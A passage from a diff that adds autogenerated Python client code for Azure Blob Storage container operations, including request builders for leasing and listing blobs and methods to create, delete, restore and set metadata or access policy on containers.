proposed_lease_id = kwargs.pop('proposed_lease_id') # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + if_modified_since = kwargs.pop('if_modified_since', None) # type: Optional[datetime.datetime] + if_unmodified_since = kwargs.pop('if_unmodified_since', None) # type: Optional[datetime.datetime] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-lease-action'] = _SERIALIZER.header("action", action, 'str') + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + _header_parameters['x-ms-proposed-lease-id'] = _SERIALIZER.header("proposed_lease_id", proposed_lease_id, 'str') + if if_modified_since is not None: + _header_parameters['If-Modified-Since'] = _SERIALIZER.header("if_modified_since", if_modified_since, 'rfc-1123') + if if_unmodified_since is not None: + _header_parameters['If-Unmodified-Since'] = _SERIALIZER.header("if_unmodified_since", if_unmodified_since, 'rfc-1123') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_list_blob_flat_segment_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "list") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + prefix = kwargs.pop('prefix', None) # type: Optional[str] + marker = kwargs.pop('marker', None) # type: Optional[str] + maxresults = kwargs.pop('maxresults', None) # type: Optional[int] + include = kwargs.pop('include', None) # type: Optional[List[Union[str, "_models.ListBlobsIncludeItem"]]] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if prefix is not None: + _query_parameters['prefix'] = _SERIALIZER.query("prefix", prefix, 'str') + if marker is not None: + _query_parameters['marker'] = _SERIALIZER.query("marker", marker, 'str') + if maxresults is not None: + _query_parameters['maxresults'] = _SERIALIZER.query("maxresults", maxresults, 'int', minimum=1) + if include is not None: + _query_parameters['include'] = _SERIALIZER.query("include", include, '[str]', div=',') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_list_blob_hierarchy_segment_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "list") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + delimiter = kwargs.pop('delimiter') # type: str + prefix = kwargs.pop('prefix', None) # type: Optional[str] + marker = kwargs.pop('marker', None) # type: Optional[str] + maxresults = kwargs.pop('maxresults', None) # type: Optional[int] + include = kwargs.pop('include', None) # type: Optional[List[Union[str, "_models.ListBlobsIncludeItem"]]] + timeout = kwargs.pop('timeout', None) # type: Optional[int] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + if prefix is not None: + _query_parameters['prefix'] = _SERIALIZER.query("prefix", prefix, 'str') + _query_parameters['delimiter'] = _SERIALIZER.query("delimiter", delimiter, 'str') + if marker is not None: + _query_parameters['marker'] = _SERIALIZER.query("marker", marker, 'str') + if maxresults is not None: + _query_parameters['maxresults'] = _SERIALIZER.query("maxresults", maxresults, 'int', minimum=1) + if include is not None: + _query_parameters['include'] = _SERIALIZER.query("include", include, '[str]', div=',') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_get_account_info_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + restype = kwargs.pop('restype', "account") # type: str + comp = kwargs.pop('comp', "properties") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + _query_parameters['comp'] = _SERIALIZER.query("comp", comp, 'str') + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + +# fmt: on +class ContainerOperations(object): + """ + .. warning:: + **DO NOT** instantiate this class directly. + + Instead, you should access the following operations through + :class:`~azure.storage.blob.AzureBlobStorage`'s + :attr:`container` attribute. + """ + + models = _models + + def __init__(self, *args, **kwargs): + args = list(args) + self._client = args.pop(0) if args else kwargs.pop("client") + self._config = args.pop(0) if args else kwargs.pop("config") + self._serialize = args.pop(0) if args else kwargs.pop("serializer") + self._deserialize = args.pop(0) if args else kwargs.pop("deserializer") + + + @distributed_trace + def create( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + metadata=None, # type: Optional[Dict[str, str]] + access=None, # type: Optional[Union[str, "_models.PublicAccessType"]] + request_id_parameter=None, # type: Optional[str] + container_cpk_scope_info=None, # type: Optional["_models.ContainerCpkScopeInfo"] + **kwargs # type: Any + ): + # type: (...) -> None + """creates a new container under the specified account. If the container with the same name + already exists, the operation fails. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param access: Specifies whether data in the container may be accessed publicly and the level + of access. Default value is None. + :type access: str or ~azure.storage.blob.models.PublicAccessType + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param container_cpk_scope_info: Parameter group. Default value is None. + :type container_cpk_scope_info: ~azure.storage.blob.models.ContainerCpkScopeInfo + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + + _default_encryption_scope = None + _prevent_encryption_scope_override = None + if container_cpk_scope_info is not None: + _default_encryption_scope = container_cpk_scope_info.default_encryption_scope + _prevent_encryption_scope_override = container_cpk_scope_info.prevent_encryption_scope_override + + request = build_create_request( + url=self._config.url, + restype=restype, + version=self._config.version, + timeout=timeout, + metadata=metadata, + access=access, + request_id_parameter=request_id_parameter, + default_encryption_scope=_default_encryption_scope, + prevent_encryption_scope_override=_prevent_encryption_scope_override, + template_url=self.create.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + create.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def get_properties( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """returns all user-defined metadata and system properties for the specified container. The data + returned does not include the container's list of blobs. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + + _lease_id = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + + request = build_get_properties_request( + url=self._config.url, + restype=restype, + version=self._config.version, + timeout=timeout, + lease_id=_lease_id, + request_id_parameter=request_id_parameter, + template_url=self.get_properties.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-meta']=self._deserialize('{str}', response.headers.get('x-ms-meta')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration')) + response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state')) + response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-public-access']=self._deserialize('str', response.headers.get('x-ms-blob-public-access')) + response_headers['x-ms-has-immutability-policy']=self._deserialize('bool', response.headers.get('x-ms-has-immutability-policy')) + response_headers['x-ms-has-legal-hold']=self._deserialize('bool', response.headers.get('x-ms-has-legal-hold')) + response_headers['x-ms-default-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-default-encryption-scope')) + response_headers['x-ms-deny-encryption-scope-override']=self._deserialize('bool', response.headers.get('x-ms-deny-encryption-scope-override')) + response_headers['x-ms-immutable-storage-with-versioning-enabled']=self._deserialize('bool', response.headers.get('x-ms-immutable-storage-with-versioning-enabled')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + get_properties.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def delete( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """operation marks the specified container for deletion. The container and any blobs contained + within it are later deleted during garbage collection. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_delete_request( + url=self._config.url, + restype=restype, + version=self._config.version, + timeout=timeout, + lease_id=_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.delete.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + delete.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def set_metadata( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + metadata=None, # type: Optional[Dict[str, str]] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """operation sets one or more user-defined name-value pairs for the specified container. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "metadata". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "metadata") # type: str + + _lease_id = None + _if_modified_since = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + + request = build_set_metadata_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + timeout=timeout, + lease_id=_lease_id, + metadata=metadata, + if_modified_since=_if_modified_since, + request_id_parameter=request_id_parameter, + template_url=self.set_metadata.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_metadata.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def get_access_policy( + self, + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> List["_models.SignedIdentifier"] + """gets the permissions for the specified container. The permissions indicate whether container + data may be accessed publicly. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "acl". Note that overriding this default value may result + in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: list of SignedIdentifier, or the result of cls(response) + :rtype: list[~azure.storage.blob.models.SignedIdentifier] + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[List["_models.SignedIdentifier"]] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "acl") # type: str + + _lease_id = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + + request = build_get_access_policy_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + timeout=timeout, + lease_id=_lease_id, + request_id_parameter=request_id_parameter, + template_url=self.get_access_policy.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-blob-public-access']=self._deserialize('str', response.headers.get('x-ms-blob-public-access')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('[SignedIdentifier]', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_access_policy.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def set_access_policy( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + access=None, # type: Optional[Union[str, "_models.PublicAccessType"]] + request_id_parameter=None, # type: Optional[str] + container_acl=None, # type: Optional[List["_models.SignedIdentifier"]] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """sets the permissions for the specified container. The permissions indicate whether blobs in a + container may be accessed publicly. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param access: Specifies whether data in the container may be accessed publicly and the level + of access. Default value is None. + :type access: str or ~azure.storage.blob.models.PublicAccessType + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param container_acl: the acls for the container. Default value is None. + :type container_acl: list[~azure.storage.blob.models.SignedIdentifier] + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "acl". Note that overriding this default value may result + in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "acl") # type: str + content_type = kwargs.pop('content_type', "application/xml") # type: Optional[str] + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + serialization_ctxt = {"xml": {'name': 'SignedIdentifiers', 'wrapped': True, 'itemsName': 'SignedIdentifier'}} + if container_acl is not None: + _content = self._serialize.body(container_acl, '[SignedIdentifier]', is_xml=True, serialization_ctxt=serialization_ctxt) + else: + _content = None + + request = build_set_access_policy_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + timeout=timeout, + lease_id=_lease_id, + access=access, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + request_id_parameter=request_id_parameter, + template_url=self.set_access_policy.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_access_policy.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace + def restore( # pylint: disable=inconsistent-return-statements + self, + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + deleted_container_name=None, # type: Optional[str] + deleted_container_version=None, # type: Optional[str] + **kwargs # type: Any + ): + # type: (...) -> None + """Restores a previously-deleted container. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param deleted_container_name: Optional. Version 2019-12-12 and later. Specifies the name of + the deleted container to restore. Default value is None. + :type deleted_container_name: str + :param deleted_container_version: Optional. Version 2019-12-12 and later. Specifies the + version of the deleted container to restore. Default value is None. + :type deleted_container_version: str + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword comp: comp. Default value is "undelete". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + comp = kwargs.pop('comp', "undelete") # type: str + + + request = build_restore_request( + url=self._config.url, + restype=restype, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + deleted_container_name=deleted_container_name, + deleted_container_version=deleted_container_version, + template_url=self.restore.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + restore.metadata = {'url': 